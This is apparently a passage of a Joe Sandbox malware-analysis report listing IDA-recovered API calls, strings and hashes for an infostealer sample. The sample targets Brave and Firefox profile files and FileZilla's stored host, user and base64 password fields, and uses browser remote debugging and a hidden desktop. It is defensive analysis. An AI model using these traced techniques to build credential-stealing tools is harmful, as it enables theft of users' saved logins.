                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFDFF4
                                • lstrlen.KERNEL32(01021794), ref: 00FFDFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE022
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FFE02E
                                • lstrlen.KERNEL32(00D689C0), ref: 00FFE03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFE06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 00FFE0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 00FFE0E7
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFE11F
                                • lstrlen.KERNEL32(00D6D398), ref: 00FFE12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE155
                                • lstrcat.KERNEL32(00000000,?), ref: 00FFE15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE19F
                                • lstrcat.KERNEL32(00000000), ref: 00FFE1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00FFE1F9
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFE22F
                                • lstrlen.KERNEL32(00D68980), ref: 00FFE23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE261
                                • lstrcat.KERNEL32(00000000,00D68980), ref: 00FFE269
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00FFE988
                                • FindClose.KERNEL32(00000000), ref: 00FFE997
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                • String ID: Brave$Preferences$\Brave\Preferences
                                • API String ID: 1346089424-1230934161
                                • Opcode ID: dd192ed216083b2e59727e866b9f3c7ec661c699a51b21c073c1b747c74c6b69
                                • Instruction ID: fbf7cf3f28b03679855891eecbcd6cb3540b44be26a14c9402886ecb55b05791
                                • Opcode Fuzzy Hash: dd192ed216083b2e59727e866b9f3c7ec661c699a51b21c073c1b747c74c6b69
                                • Instruction Fuzzy Hash: D7527D31E1021EABDB31AF65DC89ABE77B9AF44310F044028FA45E7265DB78DD41EB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF60FF
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF6152
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF6185
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF61B5
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF61F0
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF6223
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FF6233
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: bfb99edc8bc5baad26d4190ffd5ce525a65c9b1f6edc545a8a0a7d40ff6cb82a
                                • Instruction ID: 102e6453c226a05559627c17df9aab4c1d971f2238f7722f60b30106e77f8115
                                • Opcode Fuzzy Hash: bfb99edc8bc5baad26d4190ffd5ce525a65c9b1f6edc545a8a0a7d40ff6cb82a
                                • Instruction Fuzzy Hash: 75524F31D1021AABDB31EFB4DC49AAE77B9AF04310F144028FA45E7265DB78DD41EB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF4C7F
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF4CD2
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF4D05
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF4D35
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF4D73
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF4DA6
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FF4DB6
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: c7719cc128ad612824e2b10b3514615110bd0d0fcb6156194fb2d7ec985766c6
                                • Instruction ID: 583ccb9f0894b089d34a8445f2afa5c35313a47b88289ce5ba5424eeb337f035
                                • Opcode Fuzzy Hash: c7719cc128ad612824e2b10b3514615110bd0d0fcb6156194fb2d7ec985766c6
                                • Instruction Fuzzy Hash: F4528231D0121A9BDF31EFA4DC49BAE77B9AF04710F145028FA45EB264DB78ED429B90
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01006B9D
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01006BCD
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01006BFD
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01006C2F
                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 01006C3C
                                • RtlAllocateHeap.NTDLL(00000000), ref: 01006C43
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 01006C5A
                                • lstrlen.KERNEL32(00000000), ref: 01006C65
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006CA8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006CCF
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 01006CE2
                                • lstrlen.KERNEL32(00000000), ref: 01006CED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006D30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006D57
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 01006D6A
                                • lstrlen.KERNEL32(00000000), ref: 01006D75
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006DB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006DDF
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 01006DF2
                                • lstrlen.KERNEL32(00000000), ref: 01006E01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006E49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006E71
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 01006E94
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 01006EA8
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 01006EC9
                                • LocalFree.KERNEL32(00000000), ref: 01006ED4
                                • lstrlen.KERNEL32(?), ref: 01006F6E
                                • lstrlen.KERNEL32(?), ref: 01006F81
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 2641759534-2314656281
                                • Opcode ID: e09b3028be84de6e169f83cbe99454d9974df4cb22899bde5dfe7002bfaf62e0
                                • Instruction ID: fde434e9c9c281331e51cdfc64c6c6c3e7c7b3980cd2e4dbf5725607249ffbbb
                                • Opcode Fuzzy Hash: e09b3028be84de6e169f83cbe99454d9974df4cb22899bde5dfe7002bfaf62e0
                                • Instruction Fuzzy Hash: A202E530A00219AFEB72EFB8DC4DEAE7BB9AF04704F141458FA41EB295DB78D9419750
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01004B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01004B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01004B7F
                                • lstrlen.KERNEL32(01024CA8), ref: 01004B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01004BA7
                                • lstrcat.KERNEL32(00000000,01024CA8), ref: 01004BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01004BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 01004BFA
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: prefs.js
                                • API String ID: 2567437900-3783873740
                                • Opcode ID: 1623dbcb7a5358988ffb4f11d858d7d5335aee2c5b84a3a73afd2cdf91ebbf6d
                                • Instruction ID: ad33ad5af67fb561c827449a8c10887769d2e70581e15286e2361695cab66963
                                • Opcode Fuzzy Hash: 1623dbcb7a5358988ffb4f11d858d7d5335aee2c5b84a3a73afd2cdf91ebbf6d
                                • Instruction Fuzzy Hash: 7A929F30A012059FFBA6CF2DD948B69BBE5AF44318F1980ADE949DB2A1D775DC81CF40
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01001291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010012B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 010012BF
                                • lstrlen.KERNEL32(01024CA8), ref: 010012CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010012E7
                                • lstrcat.KERNEL32(00000000,01024CA8), ref: 010012F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 0100133A
                                • StrCmpCA.SHLWAPI(?,010217A0), ref: 0100135C
                                • StrCmpCA.SHLWAPI(?,010217A4), ref: 01001376
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010013AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 010013D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 010013E2
                                • lstrlen.KERNEL32(01021794), ref: 010013ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100140A
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01001416
                                • lstrlen.KERNEL32(?), ref: 01001423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001443
                                • lstrcat.KERNEL32(00000000,?), ref: 01001451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100147A
                                • StrCmpCA.SHLWAPI(?,00D6D1B8), ref: 010014A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 010014E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001535
                                • StrCmpCA.SHLWAPI(?,00D6DCF0), ref: 01001552
                                • lstrcpy.KERNEL32(00000000,?), ref: 01001593
                                • lstrcpy.KERNEL32(00000000,?), ref: 010015BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010015E4
                                • StrCmpCA.SHLWAPI(?,00D6D350), ref: 01001602
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001633
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100165C
                                • lstrcpy.KERNEL32(00000000,?), ref: 01001685
                                • StrCmpCA.SHLWAPI(?,00D6D3B0), ref: 010016B3
                                • lstrcpy.KERNEL32(00000000,?), ref: 010016F4
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100171D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001745
                                • lstrcpy.KERNEL32(00000000,?), ref: 01001796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010017BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 010017F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0100181C
                                • FindClose.KERNEL32(00000000), ref: 0100182B
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: 212b842f2e27cf08d59884fce19a8f4a831e0bd73cab9cb6113c34676f6a93ec
                                • Instruction ID: 31f80e37b1125aed426a14135b0fffc2490a74669b193ffa6b209a6454510756
                                • Opcode Fuzzy Hash: 212b842f2e27cf08d59884fce19a8f4a831e0bd73cab9cb6113c34676f6a93ec
                                • Instruction Fuzzy Hash: CF12977061021A9BEF75EF79DC89AAE7BF8AF04304F04456CF986D7290DB38D9458B90
                                APIs
                                • wsprintfA.USER32 ref: 0100CBFC
                                • FindFirstFileA.KERNEL32(?,?), ref: 0100CC13
                                • lstrcat.KERNEL32(?,?), ref: 0100CC5F
                                • StrCmpCA.SHLWAPI(?,010217A0), ref: 0100CC71
                                • StrCmpCA.SHLWAPI(?,010217A4), ref: 0100CC8B
                                • wsprintfA.USER32 ref: 0100CCB0
                                • PathMatchSpecA.SHLWAPI(?,00D68900), ref: 0100CCE2
                                • CoInitialize.OLE32(00000000), ref: 0100CCEE
                                  • Part of subcall function 0100CAE0: CoCreateInstance.COMBASE(0101B110,00000000,00000001,0101B100,?), ref: 0100CB06
                                  • Part of subcall function 0100CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0100CB46
                                  • Part of subcall function 0100CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 0100CBC9
                                • CoUninitialize.COMBASE ref: 0100CD09
                                • lstrcat.KERNEL32(?,?), ref: 0100CD2E
                                • lstrlen.KERNEL32(?), ref: 0100CD3B
                                • StrCmpCA.SHLWAPI(?,0101CFEC), ref: 0100CD55
                                • wsprintfA.USER32 ref: 0100CD7D
                                • wsprintfA.USER32 ref: 0100CD9C
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 0100CDB0
                                • wsprintfA.USER32 ref: 0100CDD8
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 0100CDF1
                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0100CE10
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 0100CE28
                                • CloseHandle.KERNEL32(00000000), ref: 0100CE33
                                • CloseHandle.KERNEL32(00000000), ref: 0100CE3F
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0100CE54
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100CE94
                                • FindNextFileA.KERNEL32(?,?), ref: 0100CF8D
                                • FindClose.KERNEL32(?), ref: 0100CF9F
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 3860919712-2388001722
                                • Opcode ID: 98b8d36ad92c3b26cdadcc6b5b3eff152533aba368ddd1940af0fd7aed181d2b
                                • Instruction ID: 15693f5e8b730f2f1e1aba31339e9eef1a1eef1606044567aacdcff7fb188e84
                                • Opcode Fuzzy Hash: 98b8d36ad92c3b26cdadcc6b5b3eff152533aba368ddd1940af0fd7aed181d2b
                                • Instruction Fuzzy Hash: 23C16171900219AFEB71DF64DC49EEE77B9BF48300F044598FA49A7284DB34AA84CF50
                                APIs
                                • memset.MSVCRT ref: 00FF9790
                                • lstrcat.KERNEL32(?,?), ref: 00FF97A0
                                • lstrcat.KERNEL32(?,?), ref: 00FF97B1
                                • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 00FF97C3
                                • memset.MSVCRT ref: 00FF97D7
                                  • Part of subcall function 01013E70: lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01013EA5
                                  • Part of subcall function 01013E70: lstrcpy.KERNEL32(00000000,00D6E3D8), ref: 01013ECF
                                  • Part of subcall function 01013E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,00FF134E,?,0000001A), ref: 01013ED9
                                • wsprintfA.USER32 ref: 00FF9806
                                • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00FF9827
                                • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00FF9844
                                  • Part of subcall function 010146A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 010146B9
                                  • Part of subcall function 010146A0: Process32First.KERNEL32(00000000,00000128), ref: 010146C9
                                  • Part of subcall function 010146A0: Process32Next.KERNEL32(00000000,00000128), ref: 010146DB
